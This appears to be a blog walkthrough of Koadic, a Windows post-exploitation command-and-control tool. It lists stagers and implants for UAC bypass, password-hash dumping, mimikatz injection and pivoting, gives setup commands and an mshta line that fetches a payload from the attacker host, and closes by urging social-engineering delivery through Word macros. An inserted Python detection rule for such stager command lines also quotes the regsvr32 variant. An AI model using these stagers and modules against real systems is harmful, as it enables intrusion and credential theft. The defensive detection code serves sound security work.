Koadic project homepage
Introduction
Koadic, or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and PowerShell Empire. The main difference is that Koadic uses Windows Script Host (a.k.a. JScript/VBScript) to perform most of its operations, with compatibility in the core to support a default installation of Windows 2000 with no Service Packs (and potentially even versions of NT4) through Windows 10.
It is possible to serve payloads completely in memory from stage 0 onward, and to use cryptographically secure communications over SSL and TLS (depending on what the victim operating system has enabled).
Koadic also tries to be compatible with both Python 2 and Python 3.
Usage
Command | Description |
---|---|
load | reloads all modules |
info | shows the current module options |
use | switch to a different module |
set | sets a variable for the current module |
jobs | shows info about jobs |
help | displays help info for a command |
cmdshell | command shell to interact with a zombie |
kill | kills a job |
listeners | shows info about stagers |
exit | exits the program |
zombies | lists hooked targets (all zombie sessions) |
run | runs the current module (the same role as exploit) |
verbose | toggles verbose output |
Stagers
Stagers are the kinds of payload generated on your attacking machine.
Module | Description |
---|---|
stager/js/mshta | serves payloads in memory using MSHTA.exe HTML Applications |
stager/js/regsvr | serves payloads in memory using regsvr32.exe COM+ scriptlets |
stager/js/rundll32_js | serves payloads in memory using rundll32.exe |
stager/js/disk | serves payloads using files on disk |
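The three in-memory stagers above all launch a signed Windows binary (mshta.exe, regsvr32.exe or rundll32.exe) with a URL on its command line, and that argument is what a defender keys on. The following is an added example, not Koadic's own code: a small process-creation triage rule run over constructed sample records; the rule table, the sample command lines and the placeholder URL path STAGER are assumptions for this example.

```python
import re

# Added example, not Koadic's own code: a process-creation triage rule for the
# three in-memory stagers in the table above. Each one launches a signed Windows
# binary with a URL (or script: protocol) on the command line, which is the
# detectable trait; admin use of the same binaries normally passes a local file.
# Patterns and sample records are constructed for this example.
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
SCRIPT_PROTO_RE = re.compile(r"\b(?:javascript|vbscript):", re.IGNORECASE)
SCROBJ_RE = re.compile(r"scrobj\.dll", re.IGNORECASE)
# Image file name -> patterns that make its command line worth an analyst's look.
RULES = {
    "mshta.exe": [URL_RE, SCRIPT_PROTO_RE],
    "regsvr32.exe": [URL_RE, SCROBJ_RE],
    "rundll32.exe": [URL_RE, SCRIPT_PROTO_RE],
}


def flag_process_creation(image, command_line):
    """Return the indicators matched in one process-creation event ([] if none)."""
    # Caveat: stager/js/disk runs a dropped file, so a URL-keyed rule will not
    # see it; pair this with file-creation telemetry for that variant.
    exe = image.replace("\\", "/").rsplit("/", 1)[-1].lower()
    hits = []
    for pattern in RULES.get(exe, []):
        match = pattern.search(command_line)
        if match:
            hits.append(match.group(0))
    return hits


# Constructed (Image, CommandLine) records, not real telemetry; the first one is
# the stager command that appears in the walkthrough further down this page.
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\mshta.exe", "mshta http://192.168.145.129:6666/DDEUV"),
    (r"C:\Windows\System32\mshta.exe", r"mshta.exe C:\Program Files\Vendor\setup.hta"),
    (r"C:\Windows\System32\regsvr32.exe", "regsvr32 /s /i:http://192.168.145.129:6666/STAGER scrobj.dll"),
    (r"C:\Windows\System32\regsvr32.exe", r"regsvr32 /s C:\Windows\System32\msxml3.dll"),
    (r"C:\Windows\System32\rundll32.exe", "rundll32.exe shell32.dll,Control_RunDLL"),
    (r"C:\Windows\System32\notepad.exe", "notepad http://example.com/notes.txt"),
]


def scan(events):
    """Return [(command_line, hits)] for every event that trips a rule."""
    findings = []
    for image, command_line in events:
        hits = flag_process_creation(image, command_line)
        if hits:
            findings.append((command_line, hits))
    return findings
```

Only two of the six constructed records trip a rule (the mshta stager and the regsvr32 scriptlet launch); the local .hta, the local DLL registration, the ordinary rundll32 call and a non-LOLBin process with a URL stay quiet.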
Implants
Module | Description |
---|---|
implant/elevate/bypassuac_sdclt | Uses enigma0x3’s sdclt.exe exploit to bypass UAC on Windows 10. |
implant/fun/zombie | Maxes volume and opens The Cranberries YouTube in a hidden window. |
implant/fun/voice | Plays a message over text-to-speech. |
implant/gather/clipboard | Retrieves the current content of the user clipboard. |
implant/gather/hashdump_sam | Retrieves hashed passwords from the SAM hive. |
implant/gather/hashdump_dc | Domain controller hashes from the NTDS.dit file. |
implant/inject/mimikatz_dynwrapx | Injects a reflective-loaded DLL to run powerkatz.dll (using Dynamic Wrapper X). |
implant/inject/mimikatz_dotnet2js | Injects a reflective-loaded DLL to run powerkatz.dll (@tirannido DotNetToJS). |
implant/inject/shellcode_excel | Runs arbitrary shellcode payload (if Excel is installed). |
implant/manage/enable_rdesktop | Enables remote desktop on the target. |
implant/manage/exec_cmd | Run an arbitrary command on the target, and optionally receive the output. |
implant/pivot/stage_wmi | Hook a zombie on another machine using WMI. |
implant/pivot/exec_psexec | Run a command on another machine using psexec from sysinternals. |
implant/scan/tcp | Uses HTTP to scan open TCP ports on the target zombie LAN. |
implant/utils/download_file | Downloads a file from the target zombie. |
implant/utils/upload_file | Uploads a file from the listening server to the target zombies. |
Installation and example
Attacker machine (192.168.145.129)
Target machine: Windows 7 Ultimate (192.168.145.130)
```
git clone https://github.com/zerosum0x0/koadic.git
cd koadic
pip install -r requirements.txt
./koadic
set LHOST 192.168.145.129
set LPORT 6666
info
```
At this point you may run into the following error: UnicodeDecodeError: 'ascii' codec can't decode byte 0xe5 in position 108: ordinal not in ran
```
run
[+] Spawned a stager at http://192.168.145.129:6666/DDEUV
[!] Avoid manually editing this URL!!!
[>] mshta http://192.168.145.129:6666/DDEUV
```
Run on the target machine:
```
mshta http://192.168.145.129:6666/DDEUV
```
Once it has run, you can see the target machine has checked in.
At this point, however, there are no elevated privileges, so nothing further can be done; the next step is a bypass.
Here I chose eventvwr. Either of the two works, but note that sometimes the first one opens the Event Viewer.
As before, it only needs its parameters set.
Next, we try uploading an image to the target machine.
Thoughts
This remote-control tool not only supports TLS/SSL encryption; running silently in the background also makes the attack less visible. Its modules cover bypasses, hash and credential collection, injection, and file upload/download.
As for usage scenarios, the tool is most effective when combined with social engineering: delivery through IE or a Word macro is much more likely to get someone to "take the bait" than a cmd command.